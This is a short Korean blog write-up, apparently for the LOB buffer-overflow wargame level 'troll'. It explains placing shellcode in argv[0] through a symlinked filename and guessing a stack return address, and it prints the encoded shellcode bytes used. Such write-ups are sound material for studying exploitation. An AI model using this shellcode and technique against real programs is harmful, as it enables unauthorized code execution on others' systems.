argv[2]를 막아놨네요. 그리고 EGGSHELL도 막았고... buffer와 argv[1]를 초기화합니다.. shellcode는 어디에 넣을까요?
argv[0]에 넣어볼까요? 이 전에서 링크를 걸어서 77의 길이를 맞춰줬다면 이번엔 argv[0]을 아예 shellcode로 만들어봅시다.!
troll에 shellcode가 들어간 파일을 링크로 연결해주고
argv[0]의 주소를 확인해줍니다.
0xbffff9f6인데 /home/뭐시기 저시기 이런게 붙을 수 있대서 넉넉하게 32를 더해준 0xbffffa16을 주소로 사용했습니다.
성공했네요.!
사용한 shellcode :\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81
'CTF 공부 > LOB' 카테고리의 다른 글
| [LOB]vampire (0) | 2020.01.24 |
|---|---|
| [LOB]troll (0) | 2020.01.24 |
| [LOB]darkelf (0) | 2020.01.24 |
| [LOB]wolfman (0) | 2020.01.24 |
| [LOB]orc (0) | 2020.01.24 |
